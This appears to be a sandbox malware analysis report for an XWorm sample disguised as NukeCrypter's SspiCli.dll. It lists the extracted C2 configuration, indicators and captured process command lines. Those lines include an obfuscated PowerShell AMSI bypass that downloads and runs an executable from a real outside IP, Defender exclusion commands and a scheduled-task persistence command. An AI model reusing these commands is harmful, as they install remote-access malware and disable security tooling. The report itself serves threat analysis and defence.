Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Overview
overview
10Static
static
7NukeCrypte...or.exe
windows7-x64
7NukeCrypte...or.exe
windows10-2004-x64
7NukeCrypte...I2.dll
windows7-x64
1NukeCrypte...I2.dll
windows10-2004-x64
1NukeCrypte...or.exe
windows7-x64
7NukeCrypte...or.exe
windows10-2004-x64
10NukeCrypte...li.dll
windows7-x64
7NukeCrypte...li.dll
windows10-2004-x64
10NukeCrypter/dnlib.dll
windows7-x64
1NukeCrypter/dnlib.dll
windows10-2004-x64
1Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20250217-en -
resource tags
arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system -
submitted
08/03/2025, 19:14
Static task
static1
Behavioral task
behavioral1
Sample
NukeCrypter/FusionModule/reactor.exe
Resource
win7-20241023-en
Behavioral task
behavioral2
Sample
NukeCrypter/FusionModule/reactor.exe
Resource
win10v2004-20250217-en
Behavioral task
behavioral3
Sample
NukeCrypter/Guna.UI2.dll
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
NukeCrypter/Guna.UI2.dll
Resource
win10v2004-20250217-en
Behavioral task
behavioral5
Sample
NukeCrypter/NukeCryptor.exe
Resource
win7-20240729-en
Behavioral task
behavioral6
Sample
NukeCrypter/NukeCryptor.exe
Resource
win10v2004-20250217-en
Behavioral task
behavioral7
Sample
NukeCrypter/SspiCli.dll
Resource
win7-20241010-en
Behavioral task
behavioral8
Sample
NukeCrypter/SspiCli.dll
Resource
win10v2004-20250217-en
Behavioral task
behavioral9
Sample
NukeCrypter/dnlib.dll
Resource
win7-20240903-en
Behavioral task
behavioral10
Sample
NukeCrypter/dnlib.dll
Resource
win10v2004-20250217-en
General
-
Target
NukeCrypter/SspiCli.dll
-
Size
14.0MB
-
MD5
7697bb66b64ca30f53344f8b2a4dbd2a
-
SHA1
9fb9053ec18db85b9a55439b048fbbc694a1f9bb
-
SHA256
49861d9f7c2743bd8e7895ce173356f11474b393d9d8ecabb79b0fecc625e790
-
SHA512
7785d935729f342304ab87b4ea7d6050dfc76ff5e7a04123273769448a0de2e3d4c5df006136d47d6d3e476e8d23fdbb875484cd81ad29315faabe9ddea4fe79
-
SSDEEP
196608:y8qw4TxltmlBWDolz/tGTeyMdfkjIxj4/zHd1vqGyvnkYIiHuqZf:WxDolz/tGTeyMMIwHLiGyvnkC
Malware Config
Extracted
xworm
5.0
45.137.201.27:2010
NJSnJLx9hqfSdYjB
-
Install_directory
%LocalAppData%
-
install_file
msedge.exe
Signatures
-
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral8/files/0x0002000000022ad3-37.dat family_xworm behavioral8/memory/4948-44-0x0000000000630000-0x000000000065E000-memory.dmp family_xworm -
Xworm family
-
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 1440 powershell.exe 4816 powershell.exe 4844 powershell.exe 2580 powershell.exe -
Downloads MZ/PE file 2 IoCs
flow pid Process 7 4620 Powermode.exe 8 3096 Powermode.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation Powermode.exe Key value queried \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation Powermode.exe Key value queried \REGISTRY\USER\S-1-5-21-22591836-1183090055-1220658180-1000\Control Panel\International\Geo\Nation msedge.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\msedge.lnk msedge.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\msedge.lnk msedge.exe -
Executes dropped EXE 6 IoCs
pid Process 4620 Powermode.exe 3096 Powermode.exe 4948 msedge.exe 1084 msedge.exe 2752 msedge.exe 4956 msedge.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3500 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 16 IoCs
pid Process 4620 Powermode.exe 3096 Powermode.exe 4620 Powermode.exe 3096 Powermode.exe 1440 powershell.exe 1440 powershell.exe 4816 powershell.exe 4816 powershell.exe 4816 powershell.exe 4844 powershell.exe 4844 powershell.exe 4844 powershell.exe 2580 powershell.exe 2580 powershell.exe 2580 powershell.exe 4948 msedge.exe -
Suspicious use of AdjustPrivilegeToken 11 IoCs
description pid Process Token: SeDebugPrivilege 4620 Powermode.exe Token: SeDebugPrivilege 3096 Powermode.exe Token: SeDebugPrivilege 4948 msedge.exe Token: SeDebugPrivilege 1084 msedge.exe Token: SeDebugPrivilege 1440 powershell.exe Token: SeDebugPrivilege 4816 powershell.exe Token: SeDebugPrivilege 4844 powershell.exe Token: SeDebugPrivilege 2580 powershell.exe Token: SeDebugPrivilege 4948 msedge.exe Token: SeDebugPrivilege 2752 msedge.exe Token: SeDebugPrivilege 4956 msedge.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 4948 msedge.exe -
Suspicious use of WriteProcessMemory 22 IoCs
description pid Process procid_target PID 408 wrote to memory of 2472 408 rundll32.exe 88 PID 408 wrote to memory of 3776 408 rundll32.exe 87 PID 408 wrote to memory of 2472 408 rundll32.exe 88 PID 408 wrote to memory of 3776 408 rundll32.exe 87 PID 2472 wrote to memory of 3096 2472 cmd.exe 92 PID 2472 wrote to memory of 3096 2472 cmd.exe 92 PID 3776 wrote to memory of 4620 3776 cmd.exe 91 PID 3776 wrote to memory of 4620 3776 cmd.exe 91 PID 3096 wrote to memory of 4948 3096 Powermode.exe 94 PID 3096 wrote to memory of 4948 3096 Powermode.exe 94 PID 4620 wrote to memory of 1084 4620 Powermode.exe 95 PID 4620 wrote to memory of 1084 4620 Powermode.exe 95 PID 4948 wrote to memory of 1440 4948 msedge.exe 98 PID 4948 wrote to memory of 1440 4948 msedge.exe 98 PID 4948 wrote to memory of 4816 4948 msedge.exe 102 PID 4948 wrote to memory of 4816 4948 msedge.exe 102 PID 4948 wrote to memory of 4844 4948 msedge.exe 104 PID 4948 wrote to memory of 4844 4948 msedge.exe 104 PID 4948 wrote to memory of 2580 4948 msedge.exe 106 PID 4948 wrote to memory of 2580 4948 msedge.exe 106 PID 4948 wrote to memory of 3500 4948 msedge.exe 108 PID 4948 wrote to memory of 3500 4948 msedge.exe 108 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\rundll32.exerundll32.exe C:\Users\Admin\AppData\Local\Temp\NukeCrypter\SspiCli.dll,#11⤵
- Suspicious use of WriteProcessMemory
PID:408 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\my_script.bat2⤵
- Suspicious use of WriteProcessMemory
PID:3776 -
C:\ProgramData\Powermode.exePowermode.exe -w hidden -ComMand $m1='A';$m3='i';$m2='ms';$m=$m1+$m2+$m3;$a1='am';$a2='si';$a=$a1+$a2+'InitFailed';$b1='No';$b2='nPu';$b3='bli';$b4='c,St';$b5='at';$b6='ic';$b=$b1+$b2+$b3+$b4+$b5+$b6;$ex=$null;$aaa1=[Ref].Assembly.GetType('System.Management.Automation.'+$m+'Utils').GetField($a,$b);$aaa1.SetValue($ex,$true);$XZLqW6au='http://45.137.201.27:30054/msedge.exe';$output=[System.IO.Path]::Combine($env:APPDATA,'msedge.exe');[Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12;Invoke-WebRequest -Uri $XZLqW6au -OutFile $output;Start-Process -FilePath $output;exit3⤵
- Downloads MZ/PE file
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4620 -
C:\Users\Admin\AppData\Roaming\msedge.exe"C:\Users\Admin\AppData\Roaming\msedge.exe"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1084
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\my_script.bat2⤵
- Suspicious use of WriteProcessMemory
PID:2472 -
C:\ProgramData\Powermode.exePowermode.exe -w hidden -ComMand $m1='A';$m3='i';$m2='ms';$m=$m1+$m2+$m3;$a1='am';$a2='si';$a=$a1+$a2+'InitFailed';$b1='No';$b2='nPu';$b3='bli';$b4='c,St';$b5='at';$b6='ic';$b=$b1+$b2+$b3+$b4+$b5+$b6;$ex=$null;$aaa1=[Ref].Assembly.GetType('System.Management.Automation.'+$m+'Utils').GetField($a,$b);$aaa1.SetValue($ex,$true);$XZLqW6au='http://45.137.201.27:30054/msedge.exe';$output=[System.IO.Path]::Combine($env:APPDATA,'msedge.exe');[Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12;Invoke-WebRequest -Uri $XZLqW6au -OutFile $output;Start-Process -FilePath $output;exit3⤵
- Downloads MZ/PE file
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3096 -
C:\Users\Admin\AppData\Roaming\msedge.exe"C:\Users\Admin\AppData\Roaming\msedge.exe"4⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4948 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\msedge.exe'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1440
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msedge.exe'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4816
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\msedge.exe'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4844
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msedge.exe'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2580
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "msedge" /tr "C:\Users\Admin\AppData\Local\msedge.exe"5⤵
- Scheduled Task/Job: Scheduled Task
PID:3500
-
-
-
-
-
C:\Users\Admin\AppData\Local\msedge.exeC:\Users\Admin\AppData\Local\msedge.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2752
-
C:\Users\Admin\AppData\Local\msedge.exeC:\Users\Admin\AppData\Local\msedge.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4956
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
442KB
MD504029e121a0cfa5991749937dd22a1d9
SHA1f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA2569f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA5126a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b
-
Filesize
729B
MD5092cabe7fe4773b78ff62f414633572f
SHA1c9f77f261d45e394086f7bb23eb91b80b8d0b318
SHA25685d5ee43057001a08fa00e02a4aaf7d84a2d4407f662fa9c22b16b22a9d0738b
SHA512e5d1b866e5a50243f953b67f191c4185aecdc828e5641cae6f78486f71f337f3efedbcb6051586b886a3c321db6fb17f9fe276cbc9954e0abb41e0813589a022
-
Filesize
3KB
MD5556084f2c6d459c116a69d6fedcc4105
SHA1633e89b9a1e77942d822d14de6708430a3944dbc
SHA25688cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8
SHA5120f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e
-
Filesize
654B
MD52ff39f6c7249774be85fd60a8f9a245e
SHA1684ff36b31aedc1e587c8496c02722c6698c1c4e
SHA256e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced
SHA5121d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1
-
Filesize
2KB
MD5750e4be22a6fdadd7778a388198a9ee3
SHA18feb2054d8a3767833dd972535df54f0c3ab6648
SHA25626209c196c9c45202d27468ea707b2b46f375bb612d50271924a28f9210df6a1
SHA512b0415087dfc32908b449b876b395a607698b0f7b72031916b6fe7c002e4b163ba318b7e85c8ce41f007429e666974c04967bc14345e3f4614e34d94f5c8ae804
-
Filesize
1KB
MD58d80c45e0e047b75073a3d1c2710c68f
SHA1babc73cf30327b36d184239a2747ec94d48929f4
SHA2566859c4cad4b17bf02f7f25d9b5b9633491a29c1420ccbdf9342a459d5be05e64
SHA5125da876ce855d1d9a031899d283bf2ac6c53c4d14982a1300e4d128cbde46202a259d1299dfb40c81fcfe5fb6770fb00f404673c13967800392f8f8442a5d2d24
-
Filesize
944B
MD5d00880c95e9a469875f6803963c56a62
SHA198ed9c4da14f16ef495bd20d5a80750204cba5a1
SHA256e9cf09aad4dd4f3cd30887f4b9201a126f6c7c858ada5783870606e1a7aec544
SHA5125366ce6af7b7b9665c8ddefdb62ee01f9d7e973831a74bf555031f223c7e69d4cb39f3b5af9fdfe34cdddd3781dc0a6e2ac46d81296b89e0278a2c17dd3bfbc0
-
Filesize
944B
MD55fbb56518e82d1b1e5ef6be3b6693880
SHA14e7671d0193b6f640d81b3fb91ac17ca67e0632b
SHA256760d5623e712e53485c80330b3e2567577ffcf9397a94c3085bd1999f4650a40
SHA512ff2fff83f094820da4157c907be06039dcc58b1a23e867ba58c0c3f40d8bbd90022161dc3d77c082a765f7f4104f683be995b994183d1899c73bd9131fe614d1
-
Filesize
944B
MD583685d101174171875b4a603a6c2a35c
SHA137be24f7c4525e17fa18dbd004186be3a9209017
SHA2560c557845aab1da497bbff0e8fbe65cabf4cb2804b97ba8ae8c695a528af70870
SHA512005a97a8e07b1840abdcef86a7881fd9bdc8acbfdf3eafe1dceb6374060626d81d789e57d87ca4096a39e28d5cca00f8945edff0a747591691ae75873d2b3fb5
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
165KB
MD522a01fdc6d06f445af5de9759799225f
SHA11dde5be9d7c8a7ae68332c92a6e1263f24705f7c
SHA256682acd04365f06fd83daa81b7bbd71665a60e729d6d4ecc3693eb486b8d4a13f
SHA512e602f9d32b78c8d317698337ea2eb02b6bbf72cae13d3a5c3e3cee39c2445a8c2d85514eb7c741125364fee2f83582ce6a41154128a6c88c257cb5e41eb8f2d6